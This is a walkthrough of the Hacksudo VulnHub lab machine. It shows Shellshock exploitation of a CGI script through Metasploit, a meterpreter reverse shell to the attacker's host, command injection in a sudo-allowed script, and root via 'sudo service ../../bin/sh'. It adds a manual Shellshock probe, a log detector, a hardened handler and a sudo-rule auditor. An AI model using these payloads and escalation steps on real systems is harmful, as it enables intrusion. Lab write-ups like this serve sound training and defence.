Hacksudo
Target Information
Target host information:
Name: Hacksudo
Setup: set the target VM's network adapter to Host-only, and set one adapter of the Kali Linux attack machine to Host-only as well, so that both sit on the same LAN.
Identify IP Address of Target
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo]
└─$ sudo netdiscover -i eth1
netdiscover identifies the target's IP address as 192.168.56.133.
Port and Service Scanning (Nmap)
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.133 -oN nmap_full_scan
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-23 09:00 EDT
Nmap scan report for bogon (192.168.56.133)
Host is up (0.00012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 37:36:60:3e:26:ae:23:3f:e1:8b:5d:18:e7:a7:c7:ce (RSA)
| 256 34:9a:57:60:7d:66:70:d5:b5:ff:47:96:e0:36:23:75 (ECDSA)
|_ 256 ae:7d:ee:fe:1d:bc:99:4d:54:45:3d:61:16:f8:6c:87 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:72:FB:D9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.19 seconds
The Nmap scan shows only two open ports. Port 21 is reported as filtered (no SYN/ACK or RST came back during the scan), so check it by hand. The ftp client gets Connection refused, i.e. a TCP RST, so at this point nothing is listening on 21 and FTP is not an entry point:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo]
└─$ ftp 192.168.56.133
ftp: Can't connect to `192.168.56.133:21': Connection refused
ftp: Can't connect to `192.168.56.133:ftp'
ftp>
Enumeration
OpenSSH 7.9p1 offers no known remote exploit, so enumeration focuses on port 80.
First, check Apache 2.4.38 in searchsploit. Nothing matches a remote attack on this version; the only entry close to it, 46676, is a local privilege escalation that needs an existing foothold.
└─$ searchsploit apache 2.4.38
------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------ ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Es | linux/local/46676.php
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal | linux/webapps/39642.txt
Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) | multiple/remote/6229.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Byp | jsp/webapps/42966.py
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Byp | windows/webapps/42953.txt
Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC) | linux/dos/36906.txt
Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execut | linux/remote/34.pl
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Browsing to the web service, the default page is a login form. The page source holds nothing of interest, and there is no robots.txt.
Since it is a login form, test for SQL injection authentication bypass with the payloads from
https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
in both the username and the password field; none succeeds.
Next, brute-force directories. gobuster with directory-list-2.3-medium finds only /images and /fonts, both static asset directories, while dirb with common.txt also finds /cgi-bin. The likely reason for the difference is the trailing slash: Apache's ScriptAlias for /cgi-bin/ only matches the directory form of the request, which dirb sends and gobuster does not by default (gobuster's -f appends it). Running both tools, or gobuster with -f, avoids missing such paths.
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo]
└─$ gobuster dir -u http://192.168.56.133 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.133
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/10/23 09:03:09 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.133/images/]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.133/fonts/]
/server-status (Status: 403) [Size: 279]
===============================================================
2022/10/23 09:03:23 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo]
└─$ dirb http://192.168.56.133
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Oct 23 09:03:34 2022
URL_BASE: http://192.168.56.133/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.133/ ----
+ http://192.168.56.133/cgi-bin/ (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.133/fonts/
==> DIRECTORY: http://192.168.56.133/images/
+ http://192.168.56.133/index.php (CODE:200|SIZE:5357)
+ http://192.168.56.133/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.56.133/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.133/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sun Oct 23 09:03:35 2022
DOWNLOADED: 4612 - FOUND: 3
dirb found /cgi-bin, but requesting the directory itself returns 403 Forbidden rather than a listing, so the next step is to find the scripts inside it.
[Screenshot: 403 Forbidden for /cgi-bin/]
Because this is cgi-bin, the scan should include script extensions such as .sh alongside the usual .php, .html and .txt:
└─$ gobuster dir -u http://192.168.56.133/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.133/cgi-bin/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2022/10/23 09:09:46 Starting gobuster in directory enumeration mode
===============================================================
/shell.sh (Status: 500) [Size: 612]
Is the CGI script vulnerable to Shellshock (CVE-2014-6271)? A bash CGI script behind Apache mod_cgi is the textbook target, and a 500 from a CGI script typically means it executed but returned no valid header block, so it is worth probing.
First, confirm with Metasploit's auxiliary scanner module:
msf6 > search shellshock
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock)
1 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
2 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
3 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)
4 auxiliary/server/dhclient_bash_env 2014-09-24 normal No DHCP Client Bash Environment Variable Code Injection (Shellshock)
5 exploit/unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock)
6 exploit/linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock)
7 exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution
8 exploit/osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
9 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
10 exploit/unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock)
11 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
Interact with a module by name or index. For example info 11, use 11 or use exploit/multi/misc/xdh_x_exec
msf6 > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show options
Module options (auxiliary/scanner/http/apache_mod_cgi_bash_env):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /usr/bin/id yes Command to run (absolute paths required)
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framewor
k/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI yes Path to CGI script
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set RHOSTS 192.168.56.133
RHOSTS => 192.168.56.133
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/shell.sh
TARGETURI => /cgi-bin/shell.sh
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show options
Module options (auxiliary/scanner/http/apache_mod_cgi_bash_env):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /usr/bin/id yes Command to run (absolute paths required)
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.133 yes The target host(s), see https://github.com/rapid7/metasploit-framew
ork/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /cgi-bin/shell.sh yes Path to CGI script
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit
[+] uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The scanner returned the output of /usr/bin/id, so the script is vulnerable to Shellshock and arbitrary commands run as www-data. Next, use Metasploit's matching exploit module to get a shell.
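The same check done by hand, as an added example that is not part of the original walkthrough or of Metasploit. It builds the header value the scanner sends (a bash function definition followed by a command; the `echo; echo` supplies the blank line that ends the CGI header block so the command's output lands in the HTTP body), checks a response body for id(1) output, runs the classic local test of whether this machine's own bash still imports functions from the environment, and flags the `() {` prefix in a web-server log line, which is how a defender spots these requests regardless of which header carried them. The target address and the path /cgi-bin/shell.sh come from this page; the log lines are constructed; `probe_target` is the only function that touches the network and is not run here.

```shell
#!/bin/sh
# Added example, not from the original walkthrough or from Metasploit.
# Manual Shellshock (CVE-2014-6271) probe, response check, local bash check,
# and a detector for the attack pattern in web server logs.

# Header value that an unpatched bash executes when mod_cgi exports the
# header as an environment variable. "echo; echo" emits the blank line that
# terminates the CGI header block, so the command output reaches the HTTP
# body instead of producing a 500. $1 must be an absolute path; the CGI
# environment has a minimal PATH.
shellshock_header() {
    printf '() { :;}; echo; echo; %s' "$1"
}

# Returns 0 if a response body contains id(1) output, i.e. the command ran.
looks_vulnerable() {
    printf '%s\n' "$1" | grep -Eq 'uid=[0-9]+\([^)]*\)'
}

# Returns 0 if the bash on this machine honours function definitions passed
# through the environment (the classic local Shellshock test), 1 if it is
# patched, 2 if bash is not installed.
local_bash_vulnerable() {
    command -v bash >/dev/null 2>&1 || return 2
    out=$(env x='() { :;}; echo VULNERABLE' bash -c 'echo test' 2>/dev/null)
    case "$out" in *VULNERABLE*) return 0 ;; *) return 1 ;; esac
}

# Detection: an Apache combined-log line (or any raw header value) carrying
# the "() {" function-definition prefix is a Shellshock attempt, whichever
# header (User-Agent, Cookie, Referer, ...) it arrived in.
is_shellshock_attempt() {
    printf '%s\n' "$1" | grep -Eq '\(\) *\{'
}

# Live probe, equivalent to the Metasploit scanner with CMD=/usr/bin/id.
# Not executed in this file. Usage: probe_target 192.168.56.133 /cgi-bin/shell.sh
probe_target() {
    curl -sS -A "$(shellshock_header /usr/bin/id)" "http://$1${2:-/cgi-bin/shell.sh}"
}
```

Run `probe_target 192.168.56.133` against the lab host and pass the body to `looks_vulnerable`; on a fresh Kali `local_bash_vulnerable` returns 1, which is what the patched bash the verifier runs on should report too.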
Exploit
msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-fram
ework/wiki/Using-Metasploit
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an
address on the local machine or 0.0.0.0 to listen on all address
es.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI yes Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOSTS 192.168.56.133
RHOSTS => 192.168.56.133
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/shell.sh
TARGETURI => /cgi-bin/shell.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show advanced
Module advanced options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMDSTAGER::DECODER no The decoder stub to use.
CMDSTAGER::FLAVOR auto no The CMD Stager to use. (Accepted: auto, echo,
printf)
CMDSTAGER::SSL false no Use SSL/TLS for supported stagers
CMDSTAGER::TEMP no Writable directory for staged files
CMDSTAGER::URIPATH no Payload URI path for supported stagers
ContextInformationFile no The information file that contains context in
formation
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers.
Only set to false for non-IIS servers
DisablePayloadHandler false no Disable the handler code for the selected pay
load
EXE::Custom no Use custom exe instead of automatically gener
ating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular pay
load exe
EXE::FallBack false no Use the default template in case the specifie
d one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation me
thod.
EXE::Path no The directory in which to look for the execut
able template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FingerprintCheck true no Conduct a pre-exploit fingerprint verificatio
n
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authenticati
on
HttpRawHeaders no Path to ERB-templatized raw headers to append
to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrac
e (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authenticati
on
ListenerBindAddress no The specific IP address to bind to if differe
nt from SRVHOST
ListenerBindPort no The port to bind to if different from SRVPORT
ListenerComm no The specific communication channel to use for
this service
MSI::Custom no Use custom msi instead of automatically gener
ating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular pay
load msi
MSI::Path no The directory in which to look for the msi te
mplate
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to
SYSTEM if accepted)
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-
SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Au
to, TLS and SSL23 are auto-negotiate) (Accept
ed: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS
1.2)
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
UserAgent Mozilla/5.0 (Windows NT 10 no The User-Agent header to use for all requests
.0; Win64; x64) AppleWebKi
t/537.36 (KHTML, like Geck
o) Chrome/98.0.4758.81 Saf
ari/537.36 Edg/97.0.1072.6
9
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a ses
sion
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.133 yes The target host(s), see https://github.com/rapid7/metasploit-fr
amework/wiki/Using-Metasploit
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be
an address on the local machine or 0.0.0.0 to listen on all add
resses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated
)
TARGETURI /cgi-bin/shell.sh yes Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.101 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit
[*] Started reverse TCP handler on 192.168.56.101:5555
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (989032 bytes) to 192.168.56.133
[*] Meterpreter session 1 opened (192.168.56.101:5555 -> 192.168.56.133:36122) at 2022-10-23 10:08:51 -0400
meterpreter > getuid
Server username: www-data
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > shell
Process 1791 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.3$
Lateral Movement
sudo -l
Matching Defaults entries for www-data on HackSudoThor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on HackSudoThor:
(thor) NOPASSWD: /home/thor/./hammer.sh
bash-4.3$
So www-data may run /home/thor/./hammer.sh as thor without a password.
bash-4.3$ ls -alh /home/thor/./hammer.sh
ls -alh /home/thor/./hammer.sh
ls: cannot access '/home/thor/./hammer.sh': Permission denied
bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh
HELLO want to talk to Thor?
Enter Thor Secret Key : hello
hello
Hey Dear ! I am hello , Please enter your Secret massage : great
great
Thank you for your precious time!
bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh
HELLO want to talk to Thor?
Enter Thor Secret Key : hi
hi
Hey Dear ! I am hi , Please enter your Secret massage : bash
bash
id
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)
Entering bash as the secret message yields a shell as thor (honestly, I am not sure how one would have known to look for this). The behaviour itself points at the cause: the script passes the message into a command position (an unquoted `$message` or an `eval`) instead of printing it, so the word bash is executed. www-data cannot read /home/thor/hammer.sh, so the script can only be inspected once the thor shell is obtained.
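What the transcript shows is consistent with one pattern: the second answer is expanded in command position, so `bash` starts a shell as thor instead of being printed. Below is an added example, not the box's hammer.sh (which www-data could not read above), that reconstructs that pattern as a hypothesis and puts the hardened handler next to it. The dialogue strings are copied from the transcript; the function names and everything else are assumed.

```shell
#!/bin/sh
# Added example: hypothetical reconstruction of the hammer.sh pattern, not
# the file from the box. It shows why typing "bash" (or any command) as the
# "secret message" runs as the script's user, and how to handle the input
# safely.

# Vulnerable handler: the message lands where a command is expected.
# eval "$msg" has the same effect.
vulnerable_handler() {
    msg="$1"
    $msg                      # executes the user's input as a command
}

# Hardened handler: the message stays data. printf %s never re-parses it and
# nothing expands it in command position.
hardened_handler() {
    msg="$1"
    printf 'Message received: %s\n' "$msg"
}

# Driver with the same dialogue as hammer.sh. Reads both answers from stdin
# so it can be run non-interactively:
#   printf 'hi\necho EXECUTED\n' | run_hammer vulnerable_handler
run_hammer() {
    handler="$1"
    printf 'HELLO want to talk to Thor?\nEnter Thor Secret Key : '
    IFS= read -r key                  # -r: no backslash processing
    printf '\nHey Dear ! I am %s , Please enter your Secret massage : ' "$key"
    IFS= read -r msg
    printf '\n'
    "$handler" "$msg"
    echo "Thank you for your precious time!"
}
```

With the vulnerable handler the line `EXECUTED` appears in the output because `echo EXECUTED` ran; with the hardened handler the same input is only echoed back as text, which is why quoting every expansion and never placing user input in command position is the fix regardless of which user sudo runs the script as.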
Privilege Escalation
python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
thor@HacksudoThor:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for thor on HackSudoThor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User thor may run the following commands on HackSudoThor:
(root) NOPASSWD: /usr/bin/cat, /usr/sbin/service
thor@HacksudoThor:/usr/lib/cgi-bin$
thor may run /usr/bin/cat and /usr/sbin/service as root without a password. Both are documented on GTFOBins: sudo cat reads any file (for example /etc/shadow or /root/.ssh/id_rsa), and service builds the init script path as /etc/init.d/<name>, so passing ../../bin/sh makes it exec /bin/sh as root. The service route is used here:
thor@HacksudoThor:/usr/lib/cgi-bin$ sudo /usr/sbin/service ../../bin/sh
sudo /usr/sbin/service ../../bin/sh
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# bash -i
bash -i
bash-4.3# ls -alh
ls -alh
total 64K
drwx------ 6 root root 4.0K Jul 30 2021 .
drwxr-xr-x 18 root root 4.0K Jul 29 2021 ..
-rw------- 1 root root 302 Aug 2 2021 .bash_history
-rw-r--r-- 1 root root 598 Jun 24 2021 .bashrc
drwxr-xr-x 3 root root 4.0K Jun 24 2021 .cache
drwx------ 3 root root 4.0K Jun 11 2021 .gnupg
-rw------- 1 root root 28 Jun 24 2021 .lesshst
drwxr-xr-x 3 root root 4.0K Jun 11 2021 .local
-rw------- 1 root root 2.4K Jul 30 2021 .mysql_history
-rw-r--r-- 1 root root 144 Jun 23 2021 .pearrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Aug 2 2021 .ssh
-rw-r--r-- 1 root root 493 Jun 15 2021 .wget-hsts
-rw-r--r-- 1 root root 7.0K Jul 30 2021 proof.txt
-rw------- 1 root root 7 Aug 2 2021 root.txt
bash-4.3# cat root.txt
cat root.txt
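Both sudo rules on this box share one defect: each command is listed without arguments, so sudo accepts any arguments, and both binaries are on GTFOBins. The added example below, not from the box, audits `sudo -l`-style rule lines for that combination and shows that pinning the arguments (e.g. `/usr/sbin/service apache2 restart`, an assumed rule) removes the finding, because `../../bin/sh` can then no longer be supplied as the service name. The list of dangerous binaries is a constructed subset of GTFOBins; the sample `sudo -l` dump reuses the rules shown above.

```shell
#!/bin/sh
# Added example, not from the box or from sudo: audit the "(user) [TAG:] cmd,
# cmd..." lines that sudo -l prints for rules an attacker turns into a root
# shell or arbitrary file read. DANGEROUS is a constructed subset of GTFOBins.
DANGEROUS='cat service vi vim less more find awk env bash sh python python3 perl tar zip'

# Return 0 if basename $1 is in DANGEROUS.
is_dangerous() {
    for b in $DANGEROUS; do
        [ "$b" = "$1" ] && return 0
    done
    return 1
}

# audit_rule '(root) NOPASSWD: /usr/bin/cat, /usr/sbin/service'
# Prints one line per command: RISK ... for a GTFOBins binary allowed with
# any arguments, OK ... otherwise. A command followed by fixed arguments is
# restricted by sudo to exactly those arguments, which defeats tricks such
# as "service ../../bin/sh".
audit_rule() {
    rule="$1"
    runas=$(printf '%s' "$rule" | sed -n 's/^(\([^)]*\)).*/\1/p')
    nopasswd=no
    case "$rule" in *NOPASSWD:*) nopasswd=yes ;; esac
    # Drop the "(runas) " prefix and an optional "TAG: " to get the command list.
    cmds=$(printf '%s' "$rule" | sed 's/^([^)]*) *//; s/^[A-Z]*: *//')
    printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r cmd; do
        cmd=$(printf '%s' "$cmd" | sed 's/^ *//; s/ *$//')
        [ -n "$cmd" ] || continue
        bin=${cmd%% *}          # first word: the binary
        args=${cmd#"$bin"}      # rest: argument restriction, if any
        if is_dangerous "${bin##*/}" && [ -z "$args" ]; then
            printf 'RISK runas=%s nopasswd=%s %s (GTFOBins binary, unrestricted arguments)\n' \
                "$runas" "$nopasswd" "$bin"
        else
            printf 'OK runas=%s nopasswd=%s %s\n' "$runas" "$nopasswd" "$cmd"
        fi
    done
}

# Audit a whole sudo -l dump: only lines beginning with "(" are rules.
# Usage: sudo -l | audit_sudo_l
audit_sudo_l() {
    while IFS= read -r line; do
        line=$(printf '%s' "$line" | sed 's/^ *//')
        case "$line" in "("*) audit_rule "$line" ;; esac
    done
}
```

On this box `sudo -l | audit_sudo_l` reports two RISK lines for thor (cat and service); the www-data rule for hammer.sh is reported OK by the binary list but is still a finding of a different kind, a user-owned script run as another user, which this audit does not try to judge.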
Tags: cgi,http,no,Hacksudo,Vulnhub,target machine,root,yes,bash
From: https://www.cnblogs.com/jason-huawen/p/16819852.html